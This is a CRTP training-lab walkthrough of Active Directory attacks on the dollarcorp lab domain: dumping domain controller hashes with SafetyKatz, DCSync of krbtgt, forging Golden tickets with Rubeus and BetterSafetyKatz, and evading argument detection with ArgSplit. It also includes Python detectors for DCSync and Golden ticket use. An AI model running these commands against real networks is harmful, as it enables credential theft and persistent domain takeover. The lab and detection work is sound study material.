# CRTP Lab 8

## Task 1

Extract secrets from the domain controller of dollarcorp.

Since we already hold Domain Admin privileges (svcadmin), we can extract every account secret stored on the DC.

Let's start a process as DA from an elevated cmd on the student VM.

{% code overflow="wrap" %}

```
# Run ArgSplit for asktgt
C:\Users\student372>cd \AD\Tools

C:\AD\Tools>ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: asktgt
set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"
C:\AD\Tools>set "z=t"
C:\AD\Tools>set "y=g"
C:\AD\Tools>set "x=t"
C:\AD\Tools>set "w=k"
C:\AD\Tools>set "v=s"
C:\AD\Tools>set "u=a"
C:\AD\Tools>set "Pwn=%u%%v%%w%%x%%y%%z%"

# Get DA shell as svcadmin

C:\AD\Tools>C:\AD\Tools\Rubeus.exe %Pwn% /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

{% endcode %}

To dump hashes from the DC itself:

* Copy Loader from the student VM to dcorp-dc
* Spawn cmd on dcorp-dc
* Set up a port forward so Loader on the DC can fetch SafetyKatz from the student VM
* Finally, run SafetyKatz

Note: `lsadump::lsa /patch` only returns NTLM hashes; it does not give us AES keys.

{% code overflow="wrap" %}

```
# Copy Loader.exe to the DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

# Spawn an interactive shell on the DC
winrs -r:dcorp-dc cmd

# On the DC: forward 127.0.0.1:8080 to the web server on the student VM (172.16.100.72:80)
# that is hosting SafetyKatz.exe, so Loader only ever talks to loopback
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72

# ArgSplit "lsadump::lsa" into %Pwn% (paste the printed set commands into this shell)
# Dump NTLM hashes from the DC
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "%Pwn% /patch" "exit"
```

{% endcode %}

Let's use DCSync to dump both NTLM and AES keys. This runs from the DA shell on the student VM: DCSync asks the DC to replicate the account over DRSUAPI, so nothing needs to be copied to the DC.

{% code overflow="wrap" %}

```
# ArgSplit "lsadump::dcsync" into %Pwn%, then pull the krbtgt secrets (NTLM and AES keys)
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit"
```

{% endcode %}
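From the defender's side, every `lsadump::dcsync` call above is a directory replication request, which the DC audits as Security event 4662 on the domain object with the DS-Replication-Get-Changes rights listed in `Properties`. The Python below is an added example, not part of the CRTP lab material, that runs that check over constructed 4662 records (the field names follow the Windows Security log; the records and the account names are made up for illustration). It needs Directory Service Access auditing enabled and a SACL on the domain object that audits Control Access, otherwise no 4662 is written at all.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records.

A DCSync (lsadump::dcsync) asks a DC for directory replication. The DC audits it as
event 4662 against the domain object, with the replication control-access rights in
the Properties field. Domain controllers do the same thing to each other all day, so
the usual exclusion is "SubjectUserName is a machine account" plus an allowlist for
known replication services (Azure AD Connect etc.).
"""
import re

# Well-known AD extended-right GUIDs used for replication.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_FILTERED,
}

GUID_RE = re.compile(r"\{?([0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12})\}?", re.I)

# Constructed sample events (not real logs): 4662 fields as a SIEM would present them.
SAMPLE_EVENTS = [
    {   # legitimate DC-to-DC replication by a computer account: excluded
        "EventID": 4662, "SubjectUserName": "DCORP-DC$", "SubjectDomainName": "dcorp",
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
        "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
    {   # the DCSync from this lab: a user account pulling all changes
        "EventID": 4662, "SubjectUserName": "svcadmin", "SubjectDomainName": "dcorp",
        "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
        "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
    },
    {   # unrelated 4662 (property read on a user object): no replication right present
        "EventID": 4662, "SubjectUserName": "student372", "SubjectDomainName": "dcorp",
        "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10",
        "Properties": "%%7688\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}",
    },
]


def replication_rights_in(event):
    """Return the set of replication extended-right GUIDs present in Properties."""
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    return guids & REPLICATION_RIGHTS


def is_dcsync_candidate(event, allowlist=()):
    """True when a non-machine, non-allowlisted principal requested replication rights."""
    if event.get("EventID") != 4662 or not replication_rights_in(event):
        return False
    subject = event.get("SubjectUserName", "")
    if subject.endswith("$"):        # machine accounts: DCs replicating with each other
        return False
    return subject.lower() not in {a.lower() for a in allowlist}


def find_dcsync(events, allowlist=()):
    """Return (DOMAIN\\user, sorted rights) for every event that looks like DCSync.

    allowlist: account names of legitimate replication services in your domain
    (hypothetical; e.g. the Azure AD Connect MSOL_* account). Empty by default.
    """
    return [
        (f"{e['SubjectDomainName']}\\{e['SubjectUserName']}", sorted(replication_rights_in(e)))
        for e in events
        if is_dcsync_candidate(e, allowlist)
    ]


if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_EVENTS):
        print(f"DCSync candidate: {subject} requested {', '.join(rights)}")
```

The machine-account exclusion is the weak spot: an attacker who has compromised a DC's computer account, or who runs DCSync with a DC's key, blends in with normal replication. Pair this with a check that the client IP in the paired 5156/DRSUAPI network events belongs to a real DC.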

## Task 2

Using the secrets of the krbtgt account, create a Golden ticket.

With the krbtgt AES256 key from DCSync we can forge a Golden ticket (a TGT encrypted and signed with krbtgt's key) to maintain persistence. The ticket stays valid until the krbtgt password is rotated twice, whatever happens to the Administrator account's own password.

{% code overflow="wrap" %}

```
# ArgSplit "golden" into %Pwn%
# Forge the TGT with Rubeus: /ldap pulls Administrator's real attributes (RID, groups, pwdlastset, ...) from the DC
# so the forged PAC matches a genuine one; /printcmd prints a command to recreate the ticket later
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /printcmd

OR

# Forge with BetterSafetyKatz instead: 10-hour lifetime, renewable for 7 days (the domain defaults), injected straight away with /ptt
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
```

{% endcode %}

Rubeus prints the full `golden` command with the values it pulled over LDAP so the ticket can be recreated later without touching the DC again. The printed command does not include `/ptt`, so add it when you actually want to import the ticket.

## Task 3

Use the Golden ticket to (once again) get domain admin privileges from a machine.

{% code overflow="wrap" %}

```
# Re-run the printed command through Loader (%Pwn% still holds "golden" from ArgSplit) and append /ptt to inject the forged TGT
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:33:55 AM" /minpassage:1 /logoncount:3335 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt
```

{% endcode %}

Finally, with the forged TGT in the session, we get a shell on dcorp-dc as Administrator (winrs echoes each command back, shown once here):

```
C:\Users\student372>winrs -r:dcorp-dc cmd

C:\Users\Administrator>set username
USERNAME=Administrator
C:\Users\Administrator>set computername
COMPUTERNAME=DCORP-DC
```
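The forged ticket above was never issued by a KDC, so the DC has no 4768 (TGT requested) for Administrator, yet the `winrs` connection still produces a 4769 (service ticket requested) for the DC's host service. Because `/ldap` copied the real RID, groups and pwdlastset into the PAC, looking at ticket fields alone finds nothing; correlating 4768/4769 across all DCs does. The Python below is an added example, not lab material: it runs that correlation over constructed events (field names follow the Security log, the records are invented). The 10-hour window matches `/endin:600` above, which is also the domain default, so a lifetime-based check would not fire either.

```python
"""Spot service-ticket requests (4769) that no KDC-issued TGT (4768) can explain.

A Golden ticket is forged offline with the krbtgt key, so the KDC never logs a 4768
for the account; its later 4769 events appear with no TGT issuance inside the TGT
lifetime. Merge events from every domain controller before correlating, because the
TGT and the service ticket can be issued by different KDCs.
"""
from datetime import datetime, timedelta

# The forged ticket in this lab uses the default TGT lifetime (/endin:600 minutes),
# so the correlation window is 10 hours; a 4770 renewal of the TGT restarts it.
TGT_LIFETIME = timedelta(minutes=600)

# Constructed sample events (not real logs), merged from every DC. 4769/4770 carry
# user@REALM in TargetUserName while 4768 carries the bare account name.
SAMPLE_EVENTS = [
    {"time": "2022-11-11T08:00:00", "EventID": 4768, "TargetUserName": "student372",
     "Status": "0x0", "IpAddress": "172.16.100.72", "Computer": "dcorp-dc"},
    {"time": "2022-11-11T09:30:00", "EventID": 4769,
     "TargetUserName": "student372@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-DC$", "IpAddress": "172.16.100.72", "Computer": "dcorp-dc"},
    # Failed TGT request (0x18 = pre-authentication failed): no TGT was issued.
    {"time": "2022-11-11T10:00:00", "EventID": 4768, "TargetUserName": "Administrator",
     "Status": "0x18", "IpAddress": "172.16.100.72", "Computer": "dcorp-dc"},
    # Golden ticket in use: winrs to the DC needs a TGS for the DC's host service,
    # but no KDC ever issued Administrator a TGT.
    {"time": "2022-11-11T10:05:00", "EventID": 4769,
     "TargetUserName": "Administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-DC$", "IpAddress": "172.16.100.72", "Computer": "dcorp-dc"},
    # TGT renewal for student372, then a TGS request within the renewed lifetime.
    {"time": "2022-11-11T17:30:00", "EventID": 4770,
     "TargetUserName": "student372@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "krbtgt", "IpAddress": "172.16.100.72", "Computer": "dcorp-dc"},
    {"time": "2022-11-11T19:00:00", "EventID": 4769,
     "TargetUserName": "student372@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-DC$", "IpAddress": "172.16.100.72", "Computer": "dcorp-dc"},
]


def account_of(target_user_name):
    """Normalise 'user' and 'user@REALM' to a lower-case account name."""
    return target_user_name.split("@", 1)[0].lower()


def tgs_without_tgt(events, lifetime=TGT_LIFETIME):
    """Return (account, time, service, client_ip) for each 4769 with no live TGT behind it."""
    last_tgt = {}   # account -> time the KDC last issued or renewed a TGT for it
    hits = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        when = datetime.fromisoformat(e["time"])
        acct = account_of(e["TargetUserName"])
        if e["EventID"] == 4768 and e.get("Status", "0x0") == "0x0":
            last_tgt[acct] = when                      # successful TGT issuance
        elif e["EventID"] == 4770 and e.get("ServiceName", "").lower().startswith("krbtgt"):
            last_tgt[acct] = when                      # TGT renewed: lifetime restarts
        elif e["EventID"] == 4769:
            issued = last_tgt.get(acct)
            if issued is None or when - issued > lifetime:
                hits.append((acct, e["time"], e["ServiceName"], e["IpAddress"]))
    return hits


if __name__ == "__main__":
    for acct, when, svc, ip in tgs_without_tgt(SAMPLE_EVENTS):
        print(f"{when}: TGS for {svc} by {acct} from {ip} with no KDC-issued TGT in the last {TGT_LIFETIME}")
```

Run this over a window that starts at least one TGT lifetime before the period you care about, otherwise every account whose TGT predates the log window looks forged. Machine accounts and accounts whose TGT came from a trusted domain need their own handling; and if the attacker forged the ticket with a long `/endin`, the lifetime check should use the domain policy value, not whatever the ticket claims.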

